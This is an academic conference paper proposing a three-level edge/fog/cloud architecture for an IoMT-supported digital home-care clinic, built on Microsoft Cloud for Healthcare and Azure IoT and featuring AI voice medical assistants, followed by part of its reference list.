Abstract. The article analyzes the prospects of introducing a patient-oriented digital clinic with IoMT support. The synthesis of data-generating personal medical components and AI, ML, DL, VR, AR, blockchain technologies in the environment of digital clinic based on IoMT to improve the quality and availability of health care is described. The object of research is the processes of providing medical care to patients and perspective medical services provided by updated outpatient clinics. It is determined that the introducing of patient-oriented digital clinic with IoMT technology and voice virtual medical assistants has significant benefits for outpatient clinics functionality, contributes to the evolution of digital clinics, opens new opportunities for diagnosis, treatment and diseases prevention of patients, so the demand for this component of modern eHealth ecosystem is growing and will grow in the future. It is established that the strengthening and promising component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, AR, VR. It is justified that the proposed solution expands the functionality of the digital clinic and makes it a powerful tool in the management and care of patient health. Keywords: Internet of Medical Things (IoMT) · digital (virtual) clinic · data-generating medical components · Edge/Fog/Cloud Computing · eHealth · voice virtual medical assistant · Microsoft Cloud for Healthcare · virtual reality (VR) · augmented reality (AR) · artificial intelligence (AI) · machine (ML) · deep learning (DL) · blockchain
1 Introduction Modern technological developments open up significant innovative opportunities to improve patient health care. The introduction of a new generation of information technology is completely changing the healthcare industry, making it more sophisticated, powerful, efficient and personalized. These technologies include Internet of Medical Things (IoMT), Virtual and Augmented Reality (VR, AR), Machine and Deep Learning (ML, DL), Big Data Analytics, Artificial Intelligence (AI), robotic medical systems, Wearables, blockchain, etc. IoMT technology plays an important role in the digital transformation of the healthcare system. It allows a variety of medical devices with built-in © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 515–529, 2023. https://doi.org/10.1007/978-3-031-35467-0_31
516
I. Kryvenko et al.
sensors, biomedical scanners to connect to the health information system via the Internet [1]. At the same time, IoMT devices are able to work together, accumulate, quickly analyze and automatically process large arrays of medical data. Problem Statement and Analysis of Existing Research IoMT technologies have promising potential for building digital (virtual) clinics as an innovative component of the digital healthcare ecosystem. The introduction of a digital clinic with IoMT support is conducive to better and more comprehensive patient health care and could considerably benefit outpatient clinics functionality. We analyzed scientific publications for 2010–2022 in specialized biomedical bibliographical databases PubMed, Trip, Medline along with Google Scholar and searched for evidence on the effective use of digital clinics by patients as a component of the digital ecosystem of health care facilities. The results showed that in most cases the patients were proposed to use digital clinic in fact as a regular telemedicine web application. This approach was limited to minimal functionality, providing the opportunity for online and offline telemedicine consultations. It also provided information to patients and communication with the health care facility. Despite the limited functionality, the results of metaanalyzes, systematic reviews and randomized clinical trials confirm the presence of significant evidence to support the use of digital clinics in patient care [2–4]. We believe that building a new generation of patient-oriented digital clinics with the substantial support of IoMT and modern technologies has considerable advantages. The proposed innovation will significantly improve the quality of medical services to patients and strengthen the capacity of digital clinics. In this study, our research was focused on the features of the development and implementation of a digital clinic with IoMT technologies support. Also our efforts were focused on finding effective solutions to expand the functionality of patient-oriented digital clinic. It is also important to identify the benefits of using this innovative service and its function in the eHealth ecosystem. This approach complements telemedicine counseling and improves distant home health care for patients while they experienced restricted ability to visit physically a health care facility. Much attention has been paid to the study of modern eHealth services. The analysis of scientific publications in PubMed, Trip, WoS, Scopus, IEEE for 2020–2022 period shows a growing interest in the use of modern technologies in e-health. In their research, scientists are actively considering the ways to use AI, ML, DL to improve patient health and provide better medical care, such as for cardiovascular [5], cancer [6], endocrinology [7], nervous diseases [8], etc. Studies of clinical applications of VR and AR in the treatment and rehabilitation of patients are quite common [9]. Recently, a number of appearing publications were devoted to Internet of Things and IoMT [1, 10–15]. These studies analyze various architectural solutions for IoMT deployment [16–21]. In addition, it is advisable to use blockchain to ensure reliable data protection [22–26]. Research on modern digital services for the prevention of infectious diseases is relevant [27]. The implementation of IoMT was successful in this direction [28]. There is also growing interest in digital health in application to Military, Tactical and Emergency medicine [29]. There are studies that suggest the use of chatbots, which mostly work on scripts [30]. However, this significantly limits their potential in health care [31].
The Internet of Medical Things
517
Our research has primarily led to the intention of introducing a patient-centered digital clinic as a component of the eHealth ecosystem and implementing the Hospital at Home and Home Health projects. The original perspective of our research lies in the synthesis of modern technologies in the digital clinic environment, which provides enhanced solutions to improve patient health care. In addition, we identify ways to increase the functionality of the digital clinic and consider effective solutions for its implementation. Our research results show that there are currently almost no studies implementing a patient-centered digital clinic project with IoMT technology support. The purposes of the article are to analyze the prospects of implementing a patientoriented digital clinic with IoMT support, to characterize the synthesis of AI, ML, DL, VR, AR, Blockchain technologies in the environment of a digital clinic based on IoMT to improve patient health and provide quality care. The tasks of the article are: (1) to substantiate the prospects and feasibility of introducing a digital clinic for home health care with IoMT support and e-health modern technologies capability; (2) to explore IoMT-solutions application and features in development of the patient-oriented digital clinic with integration of data-generating medical components and modern technologies such as AI, ML, DL, AR, VR, Blockchain in the Edge/Fog/Cloud computing environment; (3) to analyze the Microsoft Cloud for Healthcare solution, integrated with Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform, and Microsoft 365, to deploy a patient-centered digital clinic. Paper structure includes: (1) substantiation of the digital clinic architecture with IoMT support for home health care in the Edge/Fog/Cloud computing environment; (2) analysis of AI methods, including ML and DL, for data-generating medical components analytics in a digital clinic with IoMT support; (3) analysis of AR and VR advanced capabilities for health care in a digital clinic; (4) analysis of blockchain technology to ensure a high level of data privacy and security; (5) implementation of the Microsoft Cloud for Healthcare solution with integration of Microsoft Azure IoT, Dynamics 365 and other compatible Microsoft services for deployment of patient-oriented digital clinic; (6) results and conclusions.
2 Materials and Methods IoMT refers to the Internet of Things (IoT), which is used for medical purposes and has its own characteristics and peculiarities within framework of digital clinics design. Modern IoMT solutions are deployed at different levels of architecture and involve the use of different computational paradigms, methods of processing, analysis and data transmission. This is important to ensure a high level of performance, reliability and security of the IoMT network. The basic level of the IoMT architecture is data-generating medical components (medical devices, sensors, biosensors, etc.) and digital communication tools in the process of patient’s health monitoring. Those components are characterized by different sizes, shapes and levels of technological complexity depending on the task they have to perform in IoMT. Application of Modern Biosensors and IoMT sensors assumes direct contact with the patient of portable smart devices in order to monitor health and collect a variety of physiological data. The sensors transmit a considerable amount of patient
518
I. Kryvenko et al.
data via the IoMT network, which is then processed on a cloud server in real time. As a result of this design, there may be delays due to the transfer of data between cloud computing and the end user. To avoid this situation and to improve the IoMT network, there has recently been a growing interest in architectures that implement collaboration between Cloud, Fog and Edge Computing (Edge/Fog Health) [10]. The level of Edge computing in the IoMT architecture assumes that some data processing processes take place directly on the medical devices to which the sensors are connected, or on a gateway device that is physically close to the sensors [10]. Examples of Edge nodes are wearable devices such as smartphones, smart watches, exo- or endocomponents of compact digital medical devices or portable special embedded and/or implanted systems. The combination of modern computational paradigms for the distribution of processing and storage of medical sensor’s data is an effective solution. This eliminates possible local congestion and ensures high productivity and reliability of the virtual home health care clinic. Fog computing nodes are the next step in data processing after performing Edge calculations in IoMT medical devices for further transmission to the cloud server. The Fog layer operates at the LAN level, which includes personal computers, local servers, and gateways that may be physically more remote from the medical sensors. It involves collecting data from medical sensor networks and peripheral Edge medical devices to perform data processing localized within the vicinity of data-generating medical components. At the level of Cloud computing the Cloud services are used to perform highperformance computing tasks, analytics and remote storage. Among the well-known providers of Cloud services with support for the Internet of Things are the following: Microsoft Azure IoT Hub [32], Google Cloud IoT solutions [33], Amazon AWS IoT [34], IBM Watson™ IoT Platform [35] and others. Solutions for the use of cloud platforms IoMT, in particular, Microsoft Cloud for Healthcare [36], ThingSpeak for IoT Projects [37], IoT Solutions for Healthcare [38] and others, are widespread. The communication layer of the architectural components includes the suitable connection means for data transmission and data protocols used in IoMT environments. Figure 1 represents the architecture of a digital clinic system with IoMT support for home health care, which consists of three levels: (1) a device level where IoMT datagenerating medical components collect patient information and perform preliminary computing at the Edge level; (2) the Fog level at which patient information is analyzed according to the appropriate classification rules on the local server; (3) the Cloud layer performs data analysis, decision-making and coordinates the work of the patient-centered digital clinic’s ecosystem and general eHealth system. The next step in the productive operation of a patient-centered digital clinic is data analysis, which can be improved with the help of modern AI technologies. Common AI methods include ML and DL. For big data analytics in medicine, ML and DL are widely used for medical image processing, genomics that analyzes genome-wide data, and data signal processing from IoMT and data-generating medical components. ML in IoMT provides a set of important operations on medical data related to classification, clustering, ranking, automation, forecasting, anomaly detection, analysis of patterns. ML is crucial for the functioning of IoMT services and concerns the tasks of
The Internet of Medical Things
519
Fig. 1. Three-level distributed digital clinic architecture with IoMT support for home patient health care in Edge/Fog/Cloud computing
diagnosis, prediction, making the most effective clinical decisions for treatment, performing algorithmic tasks. IoMT most often uses such ML algorithms as Regression, Decision Tree, Random Forest, k Nearest Neighbors, Logistic Regression, etc. Of particular note in IoMT framework is neural network-based DL, which demonstrates high accuracy in interpreting health-related data. State-of-the-art DL algorithms can detect and recognize phenomena from digital camera, data-generating medical components and other IoMT sources in real time. This has introduced a new generation of DL programs with IoMT support, which is more powerful and efficient than ML [39]. The advantage is that DL algorithms are able to collect and efficiently process heterogeneous sensor data. Such opportunities help to better identify trends in the analysis, generate more accurate solutions for diagnosis, treatment and prognosis of the disease. AR and VR technologies have significant potential for digital home health care and updated outpatient clinics. These augmented reality technologies provide digital clinics with a three-dimensional multisensory environment. VR, AR can create a feeling of complete immersion in the corresponding authentic simulation of the virtual world [40– 43]. There is evidence of the effectiveness of therapeutic use of VR, AR technologies in the treatment of a wide range of diseases, support of cognitive-behavioral therapy, cognitive disorders, facilitation of emotional well-being and educational activities of patients. Currently, the Smart Healthcare and IoMT device market offers a broad range of e-Health sensors for measuring body temperature (Temperature Sensor), blood pressure
520
I. Kryvenko et al.
(Blood Pressure Sensor), blood sugar (Glucometer Sensor), pulse, oxygen saturation (Pulse Oximeter Sensor), air volume lungs, breathing rate (Airflow Sensor), electrical and muscular functions of the heart (Electrocardiography Sensor), electrical conductivity of the skin (Galvanic Skin Response Sensor), physical activity (Accelerometer Sensor), electrical activity of muscles at rest and during contraction (Electromyogram Sensor), biopotentials of the brain (Electroencephalography Sensor), body mass index, metabolic indicators (Body Weight Sensor), etc. In order to simultaneously collect all above-mentioned biometric data from the patient, it is possible to integrate e-Health sensors on one platform (board). The approximate cost of such a platform of e-Health sensors (15 sensors kit) is $70–100 per year of use with maintenance. In general, data-generating medical components in IoMT for home care may include e-Health sensors, wearables, smart garments and environmental sensors. Data collection in IoMT and further analyses become more effective with Edge AI support. The cost of such an IoMT with Edge AI support will be higher and depends on the number, functionality of the devices, the amount of processed information in the Edge/Fog/Cloud computing environment and the load-dependent options for the cloud platform. An important issue when building a digital clinic with IoMT for the home smart healthcare is the selection of data-generating medical components most compatible with the chosen cloud platform in the Edge/Fog/Cloud computing environment. Peerbridge Health and Smart Band Sensoria are Microsoft Azure IoT partners to develop certified IoT-enabled devices for remote patient monitoring and AI-powered smart garments. These devices have been tested in clinical trials, as a result of which their effectiveness was confirmed. It is worth noting that the market of data-generating medical components for IoMT in Ukraine is just beginning its development and still needs significant efforts, coordination for introduction and integration in the eHealth ecosystem. The Edge level in IoMT covers the collection and initial processing of data from datagenerating medical components, performing computing operations through an installed application for IoMT in a smartphone and computer. The standard for rapid interoperability of health care resources enables the distributed collection of information from datagenerating medical components. IoMT devices have limited computing power, which can cause latency due to processing large amounts of data. Fog Computing facilitates load balancing in IoMT and uses nodes located between the Edge and Cloud levels. Fog can be placed near nodes on a local network. The issue of software for nodal base stations is important. The Linux operating system is compatible with almost any modern IoT hardware platform due to its open-source code. It can be recommended for installation on a computer in an IoT network. At the same time, it is also possible to install the Windows 10 operating system, represented by two structures such as Windows 10 IoT Core and Windows 10 IoT Enterprise. Windows 10 IoT Core can support a small number of devices. At the same time, Windows 10 IoT makes it possible to use Microsoft Azure IoT services fully.
The Internet of Medical Things
521
3 Results The results of our research have shown that an effective component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, VR. Such virtual medical assistants are able to organize online conversations, can interpret patients’ answers. In addition, voice assistants can ask clarifying questions and make effective recommendations through text or AI-based speech synthesis instead of providing direct contact with a living human agent. Developed voice virtual assistants can continuously perform a variety of programmed sets of actions, user requests, generate effective decision-making. A valuable application is also the ability to identify physical space on the basis of computer vision, to determine geolocation. Voice assistants with support for AI, VR, AR allow you to guide the patient when following instructions, providing greater interactivity. They allow one to simulate a professional assistant in dealing with health issues. All of these features are effective for interactive patient interaction and are useful for supporting diagnosis, treatment, prevention and could considerably improve outpatient clinics functionality. One of the main problems with IoMT systems is the lack of common security protocols. This circumstance produces vulnerability to hacking and cyber-attacks, such as DDoS attacks in IoMT systems. To overcome this problem, modern research proposes the use of unique properties of blockchain systems for data encryption in IoMT applications. Blockchain technology allows to build applications on the blockchain platform and use smart contracts. This approach makes it possible to implement decentralized applications (Dapps) and decentralized autonomous organizations (DAO) to ensure an appropriate level of security in IoMT systems. The decision to use hybrid blockchains with support for AI, ML, DL for IoMT is promising. The most common blockchain for this implementation is Ethereum. In addition, the integration of the Ethereum blockchain with Edge AI has potential. Thanks to the Edge AI, IoMT gets numerous features related to a high level of privacy, faster system operation and lower power consumption costs [17]. Thus, it can help to develop multifaceted wearable data-generating medical components. Our research has shown that the integration of AI, ML, DL, VR, AR technologies into IoMT has significant advantages for the introduction of a digital home health care clinic. Such solutions complement its valuable capabilities and expand its functionality. ML and DL play an important role, which allows for constant monitoring of vital signs of the patient, such as: blood pressure, heart rate, respiratory rate, etc. in real time, to diagnose, to recognize the patient’s motor activity in interaction with the environment. Experimental work in our study focused on analyzing Microsoft Cloud for Healthcare solutions for deploying a patient-centered digital clinic. Microsoft Cloud for Healthcare offers a wide range of eHealth solutions. Reliable functionality of this implementation is provided due to a combination of various services of the Microsoft ecosystem. These include a combination of Microsoft Cloud for Healthcare solutions with Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform and Microsoft 365. Microsoft proposes the following tools to deploy digital health services: Virtual Health, Virtual Visits, Virtual Clinic, Home Health, Care Management, Health Assistant, Azure Health Bot, Patient Portal, Personalized care, Health Analytics, Azure Health Data Services, Text Analytics for health in Azure Cognitive Service for Language, Vision AI solutions with Azure IoT
522
I. Kryvenko et al.
Edge, Azure IoT Edge, Azure Machine Learning, Azure Storage, Azure App Services, Power BI, Blockchain with Azure virtual machines, etc. These tools create enhanced capabilities for the functionality of the patient-centered digital clinic and complement it with advanced e-health services. Powerful predictive analytics for data modeling and clinical trends identifying has significant benefits in Microsoft Cloud for Healthcare solutions [38]. It is also important that the unification and standardization of data coming from different IoMT devices are provided. This capability is implemented using Fast Healthcare Interoperability Resources (FHIR), which is an HL7 specification for Healthcare Interoperability, Azure IoT Connector services for FHIR and Digital Imaging and Communications in Medicine (DICOM), which is the International standard to transmit, store, retrieve, print, process, and display medical imaging information. A special role is played by AutoML Azure, which automates time-consuming and iterative tasks related to the development of the ML model. The possibility of connecting Blockchain with Azure virtual machines is promising. Azure has templates for deploying most blockchain registries for virtual machines. Microsoft Cloud for Healthcare focuses on the ability to create and deploy powerful AI-enabled virtual voice assistants. Azure Health Bot allows patients to interact effectively with the bot through text or voice. Health Bot implements natural language comprehension and AI technologies to identify the patient’s intentions and provide accurate information [44]. Built-in medical intelligence to support clinical decisions is key feature for creating functional voice care assistants. It is possible to include your own scripts and integrate with other IT systems and data sources. Importantly, Health Bot uses several trusted providers of medical content to create and test clinical content. For example, Microsoft may offer an effective integration of Infermedica expert system in the development of virtual health care providers. Infermedica offers an improved mechanism for analyzing the patient’s symptoms by ML means with a high level of clinical accuracy. Infermedica decision-making system is based on clinically validated probabilistic models and evidence-based approaches. The Capita Healthcare Decisions Triage resource also has strong capabilities to implement the Hospital at Home project and support the adoption of evidence-based clinical guidelines. Infermedica and Capita Healthcare Decisions Triage medical intelligence services for clinical decision-making are primarily used in US and EU countries and, consequently, are not widely known in the Ukrainian medical space. In connection with the development of IoMT, we can expect increased interest in these services in Ukraine. Obviously, this could encourage developers of Infermedica and Capita Healthcare Decisions Triage to create necessary language localization. Azure IoT allows to deploy highly functional, high-security IoT technology for healthcare. Azure IoT supports a wide range of devices, including industrial equipment, microcontrollers and sensors. An example of a successful implementation of Azure IoT is the IoT Connected Platform for COVID-19 detection and prevention of COVID-19. An effective approach to deploying a digital clinic with IoT using Microsoft Azure IoT is a SaaS solution called Azure IoT Central. This solution uses Azure IoT Hub as
The Internet of Medical Things
523
a server component integrated with other Azure services, which provides reliable communication between the cloud layer and IoT devices. There is an option to integrate IoT Hub with other Azure services. These may include ML Azure, Azure Stream Analytics for performing analytical calculations. IoT Hub is connected to Azure services such as Azure App Service for building web and mobile apps, Notifications Hub for push notifications, and PowerBI for building dashboards. To store data, Azure services use Azure Cosmos DB as a NoSQL database, Azure SQL DB as a relational SQL DBMS, Azure Blob Storage as a database for file storage, and Azure Data Lake as a distributed data store. At the same time, the Time Series Insight function provides analytics, storage and aggregation services. The volume of processed data in the IoT Hub is measured daily, the formation of the cost of use is generated monthly based on the number of IoT Hub units. For example, for 6 devices there may be no charge in Azure Standard, from 7 to 70 devices the cost will be approximately $10 to $25 per month depending on the selected services. Another service for IoMT is Azure Digital Twins, which allows simulation and creation of complex digital models of connected environments. Based on the statistics obtained from Azure Digital Twins, it is possible to better optimize the execution of operations in IoMT and costs. It is also worth noting that Azure has Azure IoT Central application templates and the capability to build your own mobile IoMT applications, and an IoMT connector with FHIR to meet the various needs of healthcare IoMT developers and simplify the development of IoMT solutions. Based on the analysis of existing reference architectures of IoT systems, we propose a modified IoMT architecture for a digital clinic that meets specific healthcare requirements. This modification includes IoMT Data-generating medical components, transformation of this data into formalized medical records, integrated services of medical intelligence for clinical decisions based on evidences (evidence-based medicine approach). The proposed modified architecture should contain the following components: • (C1) Data-generating medical components (sensors, etc.) that send data to a smartphone, tablet or computer. • (C2) Edge servers that send data to the IoMT Azure center after initial processing. • (C3) Azure API for FHIR that performs data transformation. • (C4) Data FHIR analysis, processing and visualization in Azure. • (C5) Integration of Microsoft Cloud for Healthcare services for clinical decision support. At the level of C1 components, Edge computing performs device registration, provisioning, and data ingestion. Azure IoT Edge can quickly recognize and respond to sensor input using ML. At the level of C2 components, smart IoT Edge devices send only the necessary data to the cloud, thus reducing costs. Azure Storage provides secure blob storage for unstructured data in the Azure cloud. At the level of C3 components, the Azure API for FHIR provides data transformation into a structured electronic medical record and personal health record. Azure Stream Analytics performs real-time processing and validation of both edge and cloud data. At the level of C4 components, using Power BI visualization, reasonable interactive reports based on HL7 FHIR data are created.
524
I. Kryvenko et al.
At the level of C5 components, as a result of the integration of Microsoft Cloud for Healthcare services for clinical decision support and medical intelligence services (for example, Infermedica and Capita Healthcare Decisions Triage), evidence-based clinical decisions for the patient are formed. The proposed modified reference architecture may become the basis for the implementation of the “Hospital at Home” project and be integrated into the eHealth ecosystem, supplementing it with useful services for patients. The particular design of implementation plan for the “Hospital at Home” project can be based on the specified components of the modified architecture with proper taking into account the details at each of the levels and scales of implementation. Currently, there is a lack of examples of effective implementation of a patientoriented virtual clinic with IoMT in Ukraine. The conducted research suggests possible ways to introduce such an innovation, which will surely benefit patients and doctors.
4 Discussion The practical value of the study relates to the highlights of the IoMT solutions application in the development of patient-oriented digital clinic with the integration of AI, ML, DL, AR, VR, Blockchain in Edge/Fog/Cloud Computing modern technologies. It is established that the introduction of patient-oriented digital clinic with IoMT technology and integration of AI, ML, DL, VR, AR, Blockchain in Edge/Fog/Cloud Computing has significant benefits for outpatient clinics functionality, improving and streamlining patient health care and providing quality care. IoMT technologies contribute to the evolution of digital clinics, open new opportunities for diagnosis, treatment and prevention of patients, so the demand for this component of the modern digital ecosystem is growing and will grow in the future. An important reinforcing and promising component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, VR. This innovation expands the functionality of the digital clinic and makes it a powerful tool in the management and care of patient health. The introduction of virtual medical assistants in the field of military medicine has the significant potential. It has been found that the most effective approach for a patient-centered digital home care clinic is to create a voice 3D chatbot avatar with AI and AR support. Creating dynamic voice chatbots in the format of 3D AR-avatar (Virtual Human) makes them more real and interactive. This implementation is more enjoyable for patients compared to traditional dialog chatbots based on a set of text commands. Virtual health care providers are used to diagnose, treat, monitor health, improve patient education and increase personal awareness of the disease, psychological and behavioral outcomes and adherence to treatment, increase physical activity, weight control, preparedness for doctor visits, and more. This reduces costs, staffing, increases work efficiency of outpatient clinics, improves health, and provides convenience and satisfaction for patients.
The Internet of Medical Things
525
5 Conclusions As a result of our research, the prospects and feasibility of introducing a digital clinic for home health care with IoMT support and e-health modern technologies capability have been substantiated. We have explored IoMT-solutions application and features in development of the patient-oriented digital clinic with integration of data-generating medical components and modern technologies such as AI, ML, DL, AR, VR, Blockchain in the Edge/Fog/Cloud computing environment. The proposed supplement of the digital healthcare ecosystem with an innovative and promising service that we define as a patient-centered digital clinic with broad integration of data-generating personal medical components and IoMT technologies is described and analyzed. The application of this innovation is mainly embodied in outpatient clinics updated functionality and home health care and expands the ecosystem with the Hospital at Home project, which is of great interest among patients. In our study the prospects and expediency of introducing a digital clinic for home health care with the support of IoMT and modern technologies in the electronic health system are substantiated. The architecture of a digital clinic system with IoMT support for home health care is presented. It consists of three levels: (1) the device level where IoMT data-generating medical components collect patient information and perform preliminary computing at the Edge level; (2) the Fog level at which patient information is analyzed according to the appropriate classification rules on the local server; (3) the Cloud layer which performs data analysis, decision-making and coordinates the work of the patient-centered digital clinic’s ecosystem and general eHealth system. The important step in the productive operation of a patient-centered digital clinic is data analysis, which can be improved with the help of modern AI technologies such as ML and DL. AR and VR technologies have significant potential for digital home health care and updated outpatient clinics. The results of our research have shown that an effective component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, VR. The decision to use hybrid blockchains with support for AI, ML, DL for IoMT is promising. Microsoft Cloud for Healthcare solutions with integration of Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform, Microsoft 365 for deployment of patientoriented digital clinic are analyzed. Powerful predictive analytics for data modeling and clinical trends identifying has significant benefits in Microsoft Cloud for Healthcare solutions. It is established that the Microsoft Cloud for Healthcare solution, due to the integration of various Microsoft services for the Internet of Things, allows deploying a sufficiently functional and highly secure patient-oriented digital clinic. A significant contribution is provided by the ability of Microsoft Cloud for Healthcare to develop voice virtual assistants Azure Health Bot with AI support. Built-in medical intelligence to support evidence-based clinical solutions and advanced data analytics models could offer ample opportunity to scale this innovation and expand the functionality of the prospective eHealth ecosystem. The scientific novelty of our research is the development of a modified architecture of a patient-oriented digital clinic with IoMT based on the integration of Microsoft Azure IoT and Microsoft Cloud for Healthcare solutions, which meets the particular tasks of healthcare. Important components of this architecture are the data-generating
526
I. Kryvenko et al.
medical component, the transformation of medical data into formalized electronic medical records and personal health records, and integrated medical intelligence services for high diagnostic accuracy and effective evidence-based clinical decision-making. It has been established that the defined universal components of the digital clinic architecture with IoMT can be supplemented with such a progressive solution as the creation of dynamic voice chatbots in the format of mobile 3D AR-avatar (Virtual Human) with support for AR, VR, DL to provide a simulation of human interaction to comfort the patients and decrease the stress. Prospective and promising implementations of Virtual Human for Home Health with AR/VR and DL can be (1) productive tracking of the patient’s treatment process and correct adherence to the doctor’s recommendations; (2) creation of personalized evidence-based content for coaching on emotional support for the patient, motivation, mental health, formation of the right habits for a healthy lifestyle, increasing awareness of patients about their diseases and familiarizing them with modern evidence-based treatment methods, prevention and health care; (3) generating personalized evidence-based content for cognitive training with gamification elements (game design approach) to support patient health and track progress. Currently, these implementations of Virtual Human for Home Health with AR/VR and DL can be partially achieved with Azure Health voice Bot with AI, ML support. As for the design of a more interactive 3D mobile AR-avatar, it is necessary to implement the integration of AR/VR, AI computer vision technology and more productive DL. We consider promising further research devoted to the development of a dynamic 3D ARavatar with the integration of the above specified technologies. The important issues of further research are ensuring the proper usability of the digital home health care clinic services for both health professionals and patients. In addition, the issues of ensuring a high level of medical data protection with prospective integration of Blockchain technology require attention and appropriate elaboration. Quantifying added benefit and effect size, in terms of the Cohen’s d, from the introduction of elements of the patient-centered digital clinic’s ecosystem will be an important component of further research. Such an assessment can be made based on the results of a comparative analysis of certain performance indicators of traditional health care approaches and performance indicators of pilot projects for the implementation of above discussed approaches with the aim of their further adjustment and improvement.
References 1. Dwivedi, R., Mehrotra, D., Chandra, S.: Potential of Internet of Medical Things (IoMT) applications in building a smart healthcare system: a systematic review. J. Oral Biol. Craniofac. Res. 12(2), 302–318 (2022). https://doi.org/10.1016/j.jobcr.2021.11.010 2. Murphy, E.P., et al.: Are virtual fracture clinics during the COVID-19 pandemic a potential alternative for delivering fracture care? A systematic review. Clin. Orthop. Relat. Res. 478(11), 2610–2621 (2020). https://doi.org/10.1097/CORR.0000000000001388 3. Nerpin, E., Toft, E., Fischier, J., Lindholm-Olinder, A., Leksell, J.: A virtual clinic for the management of diabetes-type 1: study protocol for a randomised wait-list controlled clinical trial. BMC Endocr. Disord. 20(1), 137 (2020). https://doi.org/10.1186/s12902-020-00615-3 4. Healy, P., et al.: Virtual outpatient clinic as an alternative to an actual clinic visit after surgical discharge: a randomised controlled trial. BMJ Qual. Saf. 28(1), 24–31 (2019). https://doi.org/ 10.1136/bmjqs-2018-008171
The Internet of Medical Things
527
5. Boyd, C., et al.: Machine learning quantitation of cardiovascular and cerebrovascular disease: a systematic review of clinical applications. Diagnostics 11(3), 551 (2021). https://doi.org/ 10.3390/diagnostics11030551 6. Murthy, N.S., Bethala, C.: Review paper on research direction towards cancer prediction and prognosis using machine learning and deep learning models. J. Ambient Intell. Humaniz. Comput. (2021). https://doi.org/10.1007/s12652-021-03147-3 7. Tan, K.R., et al.: Evaluation of machine learning methods developed for prediction of diabetes complications: a systematic review. J. Diabetes Sci. Technol. 3, 1–16 (2021). https://doi.org/ 10.1177/19322968211056917 8. Gautam, R., Sharma, M.: Prevalence and diagnosis of neurological disorders using different deep learning techniques: a meta-analysis. J. Med. Syst. 44(2), 1–24 (2020). https://doi.org/ 10.1007/s10916-019-1519-7 9. Rutkowski, S., et al.: Use of virtual reality-based training in different fields of rehabilitation: a systematic review and meta-analysis. J. Rehabil. Med. 52(11), 1–16 (2020). https://doi.org/ 10.2340/16501977-2755 10. Greco, L., Percannella, G., Ritrovato, P., Tortorella, F., Vento, M.: Trends in IoT based solutions for health care: moving AI to the edge. Pattern Recogn. Lett. 135, 346–353 (2020). https://doi.org/10.1016/j.patrec.2020.05.016 11. Poongodi, M., Sharma, A., Hamdi, M., Maode, M., Chilamkurti, N.: Smart healthcare in smart cities: wireless patient monitoring system using IoT. J. Supercomput. 77(11), 12230–12255 (2021). https://doi.org/10.1007/s11227-021-03765-w 12. Coulby, G., Clear, A., Jones, O., Young, F., Stuart, S., Godfrey, A.: Towards remote healthcare monitoring using accessible IoT technology: state-of-the-art, insights and experimental design. Biomed. Eng. Online 19(1), 80 (2020). https://doi.org/10.1186/s12938-020-00825-9 13. Aghdam, Z.N., Rahmani, A.M., Hosseinzadeh, M.: The role of the Internet of Things in healthcare: future trends and challenges. Comput. Methods Programs Biomed. 199, 105903 (2021). https://doi.org/10.1016/j.cmpb.2020.105903 14. de Queiroz, D.A., da Costa, C.A., de Queiroz, E.A.I.F., da Silveira, E.F., da Rosa Righi, R.: Internet of Things in active cancer treatment: a systematic review. J. Biomed. Inform. 118, 103814 (2021). https://doi.org/10.1016/j.jbi.2021.103814 15. Mamdiwar, S.D., Shakruwala, Z., Chadha, U., Srinivasan, K., Chang, C.Y.: Recent advances on IoT-assisted wearable sensor systems for healthcare monitoring. Biosensors 11(10), 372 (2021). https://doi.org/10.3390/bios11100372 16. Jagadeeswari, V., Subramaniyaswamy, V., Logesh, R., Vijayakumar, V.: A study on medical Internet of Things and Big Data in personalized healthcare system. Health Inf. Sci. Syst. 6(1), 1–20 (2018). https://doi.org/10.1007/s13755-018-0049-x 17. Kamruzzaman, M.M., Alrashdi, I., Alqazzaz, A.: New opportunities, challenges, and applications of Edge-AI for connected healthcare in Internet of Medical Things for smart cities. J. Healthcare Eng. 2022, 1–6 (2022). https://doi.org/10.1155/2022/2950699 18. Muna, A.: Internet of medical things and edge computing for improving healthcare in smart cities. Math. Probl. Eng. 2022, 1–10 (2022). https://doi.org/10.1155/2022/5776954 19. Tiwari, A., Viney, D., Mohamed, A.M., Haider, A., Abolfazl, M., Mohammad, S.: Patient behavioral analysis with smart healthcare and IoT. Behav. Neurol. 2021, 1–9 (2021). https:// doi.org/10.1155/2021/4028761 20. Amin, S.U., Hossain, M.S.: Edge intelligence and the Internet of Things in healthcare: a survey. IEEE Access 9, 45–59 (2021). https://doi.org/10.1109/ACCESS.2020.3045115 21. Alshehri, F., Muhammad, G.: A comprehensive survey of the Internet of Things (IoT) and AI-based smart healthcare. IEEE Access 9, 3660–3678 (2021). https://doi.org/10.1109/ACC ESS.2020.3047960
528
I. Kryvenko et al.
